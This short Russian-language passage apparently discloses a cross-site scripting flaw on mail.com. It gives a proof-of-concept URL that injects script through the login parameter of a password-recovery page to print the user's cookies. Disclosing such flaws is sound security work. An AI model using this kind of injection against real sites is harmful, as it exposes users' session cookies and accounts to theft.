На сайте mail.com существует уязвимость,
позволяющая незаконно получать чужие
данные, все тот же CSS.
Например, зайдя на свой аккаунт на сервере
откройте ссылку:
http://mymail.mail.com/scripts/common/forgotpasswd.cgi? login=<p><scripts>
document.writeln(document.cookie) </scripts --></p>
